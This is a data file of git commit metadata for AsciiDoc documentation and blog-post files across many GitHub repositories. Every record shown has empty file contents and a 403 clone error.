{"commit":"8c93aecc97237a4697449b6527697d6488f0e6e1","subject":"\ud83d\udcdd\u270f : initialize README","message":"\ud83d\udcdd\u270f : initialize README\n","repos":"benjamingarcia\/mifuchi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benjamingarcia\/mifuchi.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a52166b096d80ad4e5d1008f18cc050592ba3e","subject":"add URLs, add software versions","message":"add URLs, add software versions\n","repos":"asciidoctor\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d150020de8a6753017fe3cd8f1113c57d281314","subject":"Create README.adoc","message":"Create README.adoc","repos":"pleft\/puck.js-thermometer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pleft\/puck.js-thermometer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115cd46a8e083a2ed7e781195c4ba04bc7566e4c","subject":"Added README","message":"Added README\n","repos":"Swagger2Markup\/swagger2markup-extensions","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Swagger2Markup\/swagger2markup-extensions.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85ad4ce14ce5bfbab553ee4b44af22777423d34c","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ddba97f491c4889f684b9adf2171e1951e382b6","subject":"Update 2017-08-15-PiVPN.adoc","message":"Update 2017-08-15-PiVPN.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2017-08-15-PiVPN.adoc","new_file":"_posts\/2017-08-15-PiVPN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e30da05b6a7dd375a235c27323501f1e0a14a5da","subject":"Update 2015-05-27-star_smarter.adoc","message":"Update 2015-05-27-star_smarter.adoc","repos":"diodario\/hubpress.io,diodario\/hubpress.io,diodario\/hubpress.io","old_file":"_posts\/2015-05-27-star_smarter.adoc","new_file":"_posts\/2015-05-27-star_smarter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diodario\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568d3913a07bc48763fd9c9ab70f7940d5eb3614","subject":"Update 2016-04-19-B-L-A-N-K-05.adoc","message":"Update 2016-04-19-B-L-A-N-K-05.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-19-B-L-A-N-K-05.adoc","new_file":"_posts\/2016-04-19-B-L-A-N-K-05.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbff26f408db78c99cd7ba8863a6ef18956250e2","subject":"Add ingress controller document.","message":"Add ingress controller document.\n","repos":"dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"ingress-controllers\/readme.adoc","new_file":"ingress-controllers\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe24d52e27023698d63a33bcc2d09e1a556992c0","subject":"Update 2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","message":"Update 2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","repos":"jkamke\/jkamke.github.io,jkamke\/jkamke.github.io,jkamke\/jkamke.github.io","old_file":"_posts\/2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","new_file":"_posts\/2015-08-07-Conversation-in-Bluemix-with-IOTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkamke\/jkamke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5eafab5af81ad6acb6e409d5ba9d799b05a15bc","subject":"Update 2015-10-21-Bienvenue.adoc","message":"Update 2015-10-21-Bienvenue.adoc","repos":"itsmyr4bbit\/blog,itsmyr4bbit\/blog,itsmyr4bbit\/blog","old_file":"_posts\/2015-10-21-Bienvenue.adoc","new_file":"_posts\/2015-10-21-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsmyr4bbit\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1db339af0ce6e94efaa49af0e65417586ff692c9","subject":"Add manpage source","message":"Add manpage source\n","repos":"kamalmarhubi\/lsaddr","old_file":"lsip.adoc","new_file":"lsip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kamalmarhubi\/lsaddr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e6aff72b068ad3e8c695db8f3e82bed411edb51","subject":"Add instructions to disable Cinder volume on nodes","message":"Add instructions to disable Cinder volume on nodes\n","repos":"markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135e4d8f96af257b88f9b094e962a003b16a5e98","subject":"refs #80","message":"refs #80\n","repos":"rmpestano\/cukedoctor,rmpestano\/cukedoctor,rmpestano\/cukedoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmpestano\/cukedoctor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d3729d9bacc8c747b3698083521c9846c2fc4d9","subject":"added gitter badge - not only the image","message":"added gitter badge\n- not only the image\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"aab4dcdf55603374c3668295cf9718c9c9d12a1c","subject":"Fix badges","message":"Fix badges\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ed9a6d335cb8d1f70002641a710b05bd6d790ae","subject":"PLATSERV-184: Arreglada numeraci\u00f3n","message":"PLATSERV-184: Arreglada numeraci\u00f3n\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9c2a395d9cbc49ebbdf843e80d57504b213792c","subject":"Fix lies in README","message":"Fix lies in README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"7be7e790f774bae80fbf57d288926f773aef5d43","subject":"y2b create post Quick Review: Boxee Box by D-Link = DON'T BUY!","message":"y2b create post Quick Review: Boxee Box by D-Link = DON'T BUY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-08-Quick-Review-Boxee-Box-by-DLink--DONT-BUY.adoc","new_file":"_posts\/2011-01-08-Quick-Review-Boxee-Box-by-DLink--DONT-BUY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac1ae4d8854886c7233982209002492e494ff7ed","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d976579646175de47e58373dffb260bd45cdc53","subject":"Update 2016-10-07-understanding-experience-in-everyday-life.adoc","message":"Update 2016-10-07-understanding-experience-in-everyday-life.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-understanding-experience-in-everyday-life.adoc","new_file":"_posts\/2016-10-07-understanding-experience-in-everyday-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d49a312fb2dc9faa9a7ce70cf4f9fff4ae5a1320","subject":"functional javascript","message":"functional javascript\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"javascript_functional.adoc","new_file":"javascript_functional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"194d0e91f9f3dd4e044760a8c48c17d84a6a0afb","subject":"Update 2015-03-13-Hello-Guys.adoc","message":"Update 2015-03-13-Hello-Guys.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-13-Hello-Guys.adoc","new_file":"_posts\/2015-03-13-Hello-Guys.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56aa8a30aa78a4e945e91f63e5c60e3731861a88","subject":"y2b create post iPhone 6S Plus Bend Test","message":"y2b create post iPhone 6S Plus Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-29-iPhone-6S-Plus-Bend-Test.adoc","new_file":"_posts\/2015-09-29-iPhone-6S-Plus-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38b54c70241efe824e5c36023c2df08540156e49","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40f9e99b572f99b55af02afa385bd510af49f177","subject":"Update 2013-04-19-Short-accoustic-performance.adoc","message":"Update 2013-04-19-Short-accoustic-performance.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-19-Short-accoustic-performance.adoc","new_file":"_posts\/2013-04-19-Short-accoustic-performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"549df612a99171e91f0f8abeddd6c84b056f31ac","subject":"Update 2015-02-20-Respect-function-signatures.adoc","message":"Update 2015-02-20-Respect-function-signatures.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-20-Respect-function-signatures.adoc","new_file":"_posts\/2015-02-20-Respect-function-signatures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e57b40502b78fa9ea97437faa712914c29ccca","subject":"Update 2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","message":"Update 2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","new_file":"_posts\/2012-12-21-Un-mois-avec-IntelliJ-debut-de-lexperience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2aac8449f599af2c659101ffeb23d896b061d721","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381e8e121df44e1e168dab2d2c3eb2c21a290ae6","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3509aeca7d23346fe11b54a2bd10519635db095a","subject":"Update 2017-02-21-A-Hard-Poem.adoc","message":"Update 2017-02-21-A-Hard-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-21-A-Hard-Poem.adoc","new_file":"_posts\/2017-02-21-A-Hard-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3a82763b491e5e4de7c4cab1da932cbe4a188f0","subject":"Add deprecation note for redis_cache module name on the documentation.","message":"Add deprecation note for redis_cache module name on the documentation.\n","repos":"smahs\/django-redis,yanheng\/django-redis,GetAmbassador\/django-redis,lucius-feng\/django-redis,zl352773277\/django-redis","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yanheng\/django-redis.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a3027b9cafc3e761043efa6f9e99b4c9d46cec5c","subject":"updated docs with more info about schema mode","message":"updated docs with more info about schema mode\n","repos":"pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"263262b3470e94fa6a8204641a6bdd4c977c867c","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ed77cac0788d4bf65622e67e54a2a2419366786","subject":"UI-dev doc fixes","message":"UI-dev doc fixes\n","repos":"lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/ui-dev.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/ui-dev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab3812c3d16070d0a9c454e63801b7b1aa1721f6","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a54d35e428b0d43a7a6b611a3b96f0d5abb872b","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c58d8489426d733d1f26f504e9c920decf5c02","subject":"2021, not 2020","message":"2021, not 2020\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381e244469eebe9f620fd45a169bcfde20f48901","subject":"Add readme.","message":"Add readme.\n","repos":"byllyfish\/pylibofp,byllyfish\/pylibofp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/byllyfish\/pylibofp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bf2efe1be6b1321ebce5a88bf4aa0c400cfdb2d","subject":"docs: readme: add link to journal format","message":"docs: readme: add link to journal format\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b820ea743686f4c43b18ea05dd567e04b22376b5","subject":"Add readme","message":"Add readme","repos":"ge0ffrey\/maven-dependency-puzzlers,ge0ffrey\/maven-dependency-puzzlers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ge0ffrey\/maven-dependency-puzzlers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9c4fb4f8f4a507eb4985cf96523e1b5b64c526d","subject":"Create README.adoc","message":"Create README.adoc","repos":"adoc-editor\/editor-web,adoc-editor\/editor-web","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-web.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dca619fcaa82b791c79c69fb1acab5084e3f7ac","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-j,Yubico\/yubico-j,Yubico\/yubico-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-j.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"172db8956cbe93e06a0d32cb6ceaf9255d2bfb3a","subject":"repo: Add a readme file","message":"repo: Add a readme file\n\nThe readme will contain information about this repository. The\ninformation will probably range from trivia (e.g. 'What are dotfiles?')\nto installation instructions.\n\nIt will be written in the asciidoc[1] markup language, which most of the\nmajor git hosting providers are capable of rendering.\n\nI will try to write text files in 'ventilated prose'[2], i.e. one\nsentence per line. This should make it easier to read the plain text\nfile and easier to spot changes in git diffs.\n\n[1]: www.asciidoctor.org\n[2]: https:\/\/vanemden.wordpress.com\/2009\/01\/01\/ventilated-prose\/\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed33513c3f71cd03c037a52cb08d26284d4a974c","subject":"y2b create post New Google Chromecast (2015) - Awesome Stuff Week","message":"y2b create post New Google Chromecast (2015) - Awesome Stuff Week","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-26-New-Google-Chromecast-2015--Awesome-Stuff-Week.adoc","new_file":"_posts\/2015-10-26-New-Google-Chromecast-2015--Awesome-Stuff-Week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e48fc73b247263992ff7cf3f72dd31f5b9e8b547","subject":"PCL ROS EIGEN C++","message":"PCL ROS EIGEN C++\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Modern C++\/README.adoc","new_file":"Modern C++\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dee5ab815388ae6d15eba0e3b72e9431a016938e","subject":"Add Omni Core \u2018contributing\u2019 page for some tests.","message":"Add Omni Core \u2018contributing\u2019 page for some tests.","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/contributing.adoc","new_file":"adoc\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fee47afce29cae0c43b77ac4e734ed38ba5e7c8","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8efca6cbce87a8000b91350841110d2658d76d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 